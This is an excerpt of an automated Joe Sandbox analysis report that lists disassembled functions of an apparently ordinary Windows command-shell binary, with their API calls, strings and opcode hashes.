                                                                                                                                                                                                                          • Instruction ID: 7175edea4d6cc9168c62910b811b0d1afa56da63e0a987fdd1f26a92f087026d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c89a2e7e75d4056ad186aeb2f688d2b7ed30bb46bfc6527f1e2b3b088bd2db4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E31F039206700EFCB148F24EC09B6E3BB6EF46339F644919F592876E0D7359885EB51
                                                                                                                                                                                                                          Function 001A4759 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81filenativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 001A4782
                                                                                                                                                                                                                          • NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 001A47D4
                                                                                                                                                                                                                          • RtlReleaseRelativeName.NTDLL(?), ref: 001A47E0
                                                                                                                                                                                                                          • RtlFreeUnicodeString.NTDLL(?), ref: 001A47EA
                                                                                                                                                                                                                            • Part of subcall function 001A4823: NtQueryVolumeInformationFile.NTDLL ref: 001A484F
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 001A480E
                                                                                                                                                                                                                          • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000001), ref: 001B096F
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B097D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 2968197161-2766056989
                                                                                                                                                                                                                          • Opcode ID: 5afd1a76a5c0d2a589fb6b690693a3803c67f633b7cf1d6623e659f9944e35f6
                                                                                                                                                                                                                          • Instruction ID: 9eabf7e92e0d2772ad49fcdb7ca72c46a954ce885dc99a9c410c39c8a09097cb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5afd1a76a5c0d2a589fb6b690693a3803c67f633b7cf1d6623e659f9944e35f6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6217C75E01209ABDB11DFE5DD88AEEBBB8AF48714F104126FA06F2251D7749E44CB60
                                                                                                                                                                                                                          Function 001B7460 Relevance: 13.6, APIs: 9, Instructions: 66filenativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B7483
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B7495
                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 001B74BB
                                                                                                                                                                                                                          • fflush.MSVCRT ref: 001B74C9
                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B74E2
                                                                                                                                                                                                                          • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 001B74F8
                                                                                                                                                                                                                          • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B74FF
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B751C
                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 001B7524
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3139166086-0
                                                                                                                                                                                                                          • Opcode ID: 93a6726f1c31d9821c923de16ba0d7e72e1eedd99adaf55d649aa16e1371c6d9
                                                                                                                                                                                                                          • Instruction ID: 4b82282b3829f2904ae95941d75a4a38a2011b74180bdbaf3eac684d6b54b527
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93a6726f1c31d9821c923de16ba0d7e72e1eedd99adaf55d649aa16e1371c6d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8911B23010A200AFDB25AB60ED0EFBA7F68EF85756F44411AF401918E1D7B589C1CA62
                                                                                                                                                                                                                          Function 00194E3B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135nativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 00194E78
                                                                                                                                                                                                                            • Part of subcall function 00198E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001D8BF0,00000000,?), ref: 00198EC3
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 00194F28
                                                                                                                                                                                                                          • NtSetInformationProcess.NTDLL ref: 00194F46
                                                                                                                                                                                                                          • NtSetInformationProcess.NTDLL ref: 00194FAE
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001,00000000), ref: 001A91C8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                                                                                                                                                                                                          • String ID: %9d$P,Tw
                                                                                                                                                                                                                          • API String ID: 4212706909-2760334267
                                                                                                                                                                                                                          • Opcode ID: 38f1b2794b7671100ae30c61ef3d4a46d4841e73f3798123b44c40c9be19ce61
                                                                                                                                                                                                                          • Instruction ID: 69e69274daf6f2823ee143e929abc1c188123c66a9404e6af27129e98f877c1b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38f1b2794b7671100ae30c61ef3d4a46d4841e73f3798123b44c40c9be19ce61
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0841E3B0A01311EFDB10DFA99C49E6ABFF5EB84724F14451AF614D76D0DBB08981CBA1
                                                                                                                                                                                                                          Function 001A4875 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 376COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001A1D90: _wcsnicmp.MSVCRT ref: 001A1E14
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                            • Part of subcall function 001A4BAF: _wcsnicmp.MSVCRT ref: 001A4C1A
                                                                                                                                                                                                                            • Part of subcall function 001A4BAF: _wcsnicmp.MSVCRT ref: 001B0B39
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A4975
                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 001A4ABC
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001A4AF4
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001A4AFF
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 001A4B28
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                                                                                                                                                                          • String ID: COPYCMD
                                                                                                                                                                                                                          • API String ID: 1068965577-3727491224
                                                                                                                                                                                                                          • Opcode ID: 981907101a870203c028f5d789c979ebacbf8b8abb21e61382c300a76ed1d24c
                                                                                                                                                                                                                          • Instruction ID: 4c8cb001c2a56abd97a4396d8f18870e1b85dec89967922cacc648fde4d59466
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 981907101a870203c028f5d789c979ebacbf8b8abb21e61382c300a76ed1d24c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65D1E539A002159BCB29DF78C895ABBB3F1EF9D304F554569E80AD7281EB70ED41CB50
                                                                                                                                                                                                                          Function 00197A34 Relevance: 9.3, APIs: 6, Instructions: 338COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00197A9C
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00197AC7
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00197BCA
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00197BDC
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 001AAE5B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Heap$AllocProcesslongjmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2656838167-0
                                                                                                                                                                                                                          • Opcode ID: 369ac6c67cb1315f66d92bb07a8c47237c361e356a3b05715d12b82d0a89c61e
                                                                                                                                                                                                                          • Instruction ID: 0cdc7c3eafc8f17046e4988bf16271e5a780930d166b6c8e092387c1f5518d2c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 369ac6c67cb1315f66d92bb07a8c47237c361e356a3b05715d12b82d0a89c61e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8D10374A142159FCF38DF24C891BBEB7B1BF15300F48419DE94AA7681DB70AE81CB95
                                                                                                                                                                                                                          Function 00196E57 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                          • Opcode ID: 0f56f541fa5b24114c713ae763918ce2cdde8b03c7c7be5d3c36e498e3b21210
                                                                                                                                                                                                                          • Instruction ID: 3cd68914ae3b56017e51047e3b2c5c9c6333ad979b50dfbc604bfd17e21800bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f56f541fa5b24114c713ae763918ce2cdde8b03c7c7be5d3c36e498e3b21210
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AC1C5356083018FCB14EF24D951A6BB7E2EFA9704F44892DF8868B391EB31DD45CB92
                                                                                                                                                                                                                          Function 001A0740 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 001A08D9
                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 001A08F3
                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 001A090B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcstol$Heap$AllocProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2343214347-0
                                                                                                                                                                                                                          • Opcode ID: 750fa8e9cd073dc5f7bec778e0c91645f026c41c6176504ea10a9685194b691d
                                                                                                                                                                                                                          • Instruction ID: 46f31cbcf24ac0a041f322cb9b16a778cc92ae1ac22649043f17659af56c7b93
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 750fa8e9cd073dc5f7bec778e0c91645f026c41c6176504ea10a9685194b691d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BA1DC38A003048BDB29DFA8D895A7FBBF6EF49704F54402DE906DB641EB749C42CB90
                                                                                                                                                                                                                          Function 00196B20 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • _pipe.MSVCRT ref: 00196B4F
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00196BF7
                                                                                                                                                                                                                          • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00196C05
                                                                                                                                                                                                                            • Part of subcall function 0019E950: memset.MSVCRT ref: 0019E9A0
                                                                                                                                                                                                                            • Part of subcall function 0019E950: wcschr.MSVCRT ref: 0019E9FC
                                                                                                                                                                                                                            • Part of subcall function 0019E950: wcschr.MSVCRT ref: 0019EA14
                                                                                                                                                                                                                            • Part of subcall function 0019E950: _wcsicmp.MSVCRT ref: 0019EA80
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00196D8F
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001), ref: 001AA6D8
                                                                                                                                                                                                                            • Part of subcall function 0019A1A8: _dup.MSVCRT ref: 0019A1AF
                                                                                                                                                                                                                            • Part of subcall function 0019A1D6: _dup2.MSVCRT ref: 0019A1EA
                                                                                                                                                                                                                            • Part of subcall function 0019A16C: _close.MSVCRT ref: 0019A19B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1441200171-0
                                                                                                                                                                                                                          • Opcode ID: fd5953b746bf6b08929ac76f0c5a45d9b0edf6f1a7ed84ad2a6e3b4a9afadf2d
                                                                                                                                                                                                                          • Instruction ID: c5355a5b26595eb932e3e6d523a9ab70ba05aa333150926b06985c52587fabda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5953b746bf6b08929ac76f0c5a45d9b0edf6f1a7ed84ad2a6e3b4a9afadf2d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA9191756002019FDF28EF24DC96B2A77E1EF99320F64852EE46AD7691DB30EC41CB91
                                                                                                                                                                                                                          Function 001A6B40 Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001A6C76,00191000), ref: 001A6B47
                                                                                                                                                                                                                          • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(001A6C76,?,001A6C76,00191000), ref: 001A6B50
                                                                                                                                                                                                                          • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,001A6C76,00191000), ref: 001A6B5B
                                                                                                                                                                                                                          • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,001A6C76,00191000), ref: 001A6B62
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                                          • Opcode ID: 7f0715646e8406dba98ec8788405c4866e8f374249e096eabdfb60c4da765b38
                                                                                                                                                                                                                          • Instruction ID: d83e6b6181725b8fde021a71eff2f0506bc3c53535f8d16e617b4f26c9848fc1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f0715646e8406dba98ec8788405c4866e8f374249e096eabdfb60c4da765b38
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01D0C972043104ABCB006BE2EC0CA493F29EF44352F804002F30DC2861CA3A54818B6B
                                                                                                                                                                                                                          Function 00199458 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 328threadprocessstringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,001BC9D0,00000108,001A2107,?,00000000,00000000,00000000), ref: 001994AA
                                                                                                                                                                                                                          • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 001994D9
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001994F1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0019954A
                                                                                                                                                                                                                          • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0019955D
                                                                                                                                                                                                                            • Part of subcall function 001A1D90: _wcsnicmp.MSVCRT ref: 001A1E14
                                                                                                                                                                                                                          • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 001995B8
                                                                                                                                                                                                                          • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00199602
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00199624
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 001ABDF1
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 001ABE0D
                                                                                                                                                                                                                          • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 001ABE26
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                                                                                                                                                                          • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                                                                                                                                                                          • API String ID: 1449572041-3461277227
